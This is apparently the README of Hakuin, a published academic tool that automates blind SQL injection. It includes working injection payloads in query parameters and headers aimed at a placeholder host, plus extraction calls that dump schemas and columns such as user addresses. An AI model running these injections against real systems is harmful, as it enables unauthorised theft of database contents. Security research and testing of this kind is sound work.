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Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, such as pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = await aiohttp.get(f'http://vuln.com/', headers=headers)
        return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester:    Use this Requester
    # dbms:         Use this DBMS
    # n_tasks:      Spawns N tasks that extract column rows in parallel 
    ext = await Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB schemas.

Example 1 - Extracting DB Schemas
# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained models
schema = await ext.extract_schema(strategy='model')
Example 2 - Extracting only Table/Column Names
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')

Once you know the schema, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}